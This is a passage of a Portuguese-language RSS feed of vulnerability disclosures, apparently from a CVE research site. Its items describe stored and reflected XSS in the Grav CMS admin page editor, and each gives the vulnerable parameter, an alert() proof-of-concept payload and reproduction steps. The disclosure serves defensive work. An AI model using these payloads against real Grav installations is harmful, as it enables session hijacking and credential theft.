	srcset=&amp;#34;/p/cve-2025-66308/image-3_hu_862cece54be2132a.png 480w, /p/cve-2025-66308/image-3_hu_377bd8a8e99a5dbb.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;112&amp;#34;
		data-flex-basis=&amp;#34;269px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 01 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-66309</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-66309/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-66309/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-66309-cross-site-scripting-xss-refletido-no-endpoint-adminpagespage-parâmetro-dataheadercontentitems-localizado-na-aba-configuração-do-blog&amp;#34;&amp;gt;CVE-2025-66309: Cross-Site Scripting (XSS) refletido no endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt;, parâmetro &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt;, localizado na aba &amp;amp;ldquo;Configuração do Blog&amp;amp;rdquo;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66309&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66309&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) refletido foi identificada no endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; do aplicativo Grav. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;GET /admin/pages/[page]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não valida e sanitiza corretamente a entrada do usuário no parâmetro &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt;. Como resultado, atacantes podem criar uma URL maliciosa com um payload XSS. Quando este URL é acessado, o script injetado é refletido na resposta HTTP e executado no contexto da sessão do navegador da vítima.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-66309-cross-site-scripting-xss-refletido-no-endpoint-adminpagespage-parâmetro-dataheadercontentitems-localizado-na-aba-configuração-do-blog&amp;#34;&amp;gt;CVE-2025-66309: Cross-Site Scripting (XSS) refletido no endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt;, parâmetro &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt;, localizado na aba &amp;amp;ldquo;Configuração do Blog&amp;amp;rdquo;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66309&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66309&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) refletido foi identificada no endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; do aplicativo Grav. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;GET /admin/pages/[page]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não valida e sanitiza corretamente a entrada do usuário no parâmetro &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt;. Como resultado, atacantes podem criar uma URL maliciosa com um payload XSS. Quando este URL é acessado, o script injetado é refletido na resposta HTTP e executado no contexto da sessão do navegador da vítima.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;ImG&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;sRc&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;OnErRoR&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;XSS-PoC3&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Faça login no Painel de Administração do Grav e navegue até &amp;lt;b&amp;gt;Páginas&amp;lt;/b&amp;gt;.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Crie uma nova página ou edite uma existente.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;No campo &amp;lt;b&amp;gt;Avançado &amp;gt; Configuração do Blog &amp;gt; Itens&amp;lt;/b&amp;gt; (que corresponde a &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt;), insira o payload acima.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66309/image.png&amp;#34;
	width=&amp;#34;1910&amp;#34;
	height=&amp;#34;510&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66309/image_hu_e1d1fb13d9a9b4e7.png 480w, /p/cve-2025-66309/image_hu_3a3afba466c81fbb.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;374&amp;#34;
		data-flex-basis=&amp;#34;898px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt; &amp;lt;li&amp;gt;Salve a página.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;A carga maliciosa é refletida e renderizada pelo aplicativo sem a devida sanitização. O código JavaScript é executado imediatamente no navegador.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66309/image-1.png&amp;#34;
	width=&amp;#34;991&amp;#34;
	height=&amp;#34;534&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66309/image-1_hu_a0c6b4602ec1b3c4.png 480w, /p/cve-2025-66309/image-1_hu_db37a16e3222c488.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;185&amp;#34;
		data-flex-basis=&amp;#34;445px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 01 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-66310</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-66310/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-66310/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-66310-cross-site-scripting-xss-armazenado-no-parêmetro-dataheadertemplate-do-endpoint-adminpagespage-na-guia-avançado&amp;#34;&amp;gt;CVE-2025-66310: Cross-Site Scripting (XSS) Armazenado no Parêmetro &amp;lt;code&amp;gt;data[header][template]&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; na guia Avançado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66310&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66310&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; do aplicativo Grav. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;data[header][template]&amp;lt;/code&amp;gt;. O script é salvo no frontmatter da página e executado automaticamente sempre que o conteúdo afetado é renderizado na interface administrativa ou na visualização do frontend.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-66310-cross-site-scripting-xss-armazenado-no-parêmetro-dataheadertemplate-do-endpoint-adminpagespage-na-guia-avançado&amp;#34;&amp;gt;CVE-2025-66310: Cross-Site Scripting (XSS) Armazenado no Parêmetro &amp;lt;code&amp;gt;data[header][template]&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; na guia Avançado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66310&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66310&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; do aplicativo Grav. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;data[header][template]&amp;lt;/code&amp;gt;. O script é salvo no frontmatter da página e executado automaticamente sempre que o conteúdo afetado é renderizado na interface administrativa ou na visualização do frontend.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;POST /admin/pages/[page]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;data[header][template]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar corretamente a entrada do usuário no campo &amp;lt;code&amp;gt;data[header][template]&amp;lt;/code&amp;gt;, que está armazenado no frontmatter YAML da página. Um invasor pode injetar código JavaScript usando este campo, e o payload é renderizado e executado quando a página é acessada, especialmente na interface do Painel de Administração.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;amp;#39;PoC-XXS73&amp;amp;#39;)&amp;amp;lt;/script&amp;amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;passos-para-reproduzir&amp;#34;&amp;gt;Passos para reproduzir:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Faça login no Painel de Administração do Grav e navegue até &amp;lt;b&amp;gt;Páginas&amp;lt;/b&amp;gt;.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Crie uma nova página ou edite uma existente.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;No campo &amp;lt;b&amp;gt;Modelo Avançado&amp;lt;/b&amp;gt; (que corresponde a &amp;lt;code&amp;gt;data[header][template]&amp;lt;/code&amp;gt;), insira o seguinte:&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66310/image.png&amp;#34;
	width=&amp;#34;1910&amp;#34;
	height=&amp;#34;695&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66310/image_hu_8bfe0d4dea5df50c.png 480w, /p/cve-2025-66310/image_hu_98b89a8f489219fc.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;274&amp;#34;
		data-flex-basis=&amp;#34;659px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Salve a página.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Retorne à seção &amp;lt;b&amp;gt;Páginas&amp;lt;/b&amp;gt; e clique no &amp;lt;b&amp;gt;menu de três pontos&amp;lt;/b&amp;gt; da página afetada:&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66310/image-1.png&amp;#34;
	width=&amp;#34;819&amp;#34;
	height=&amp;#34;625&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66310/image-1_hu_910ecbc70fceca54.png 480w, /p/cve-2025-66310/image-1_hu_642c42209238d437.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;131&amp;#34;
		data-flex-basis=&amp;#34;314px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justificar;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;O payload XSS armazenado é acionado e o script é executado no navegador:&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66310/image-2.png&amp;#34;
	width=&amp;#34;753&amp;#34;
	height=&amp;#34;466&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66310/image-2_hu_9b23293ebfc30995.png 480w, /p/cve-2025-66310/image-2_hu_ad614adf733a9c65.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;161&amp;#34;
		data-flex-basis=&amp;#34;387px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
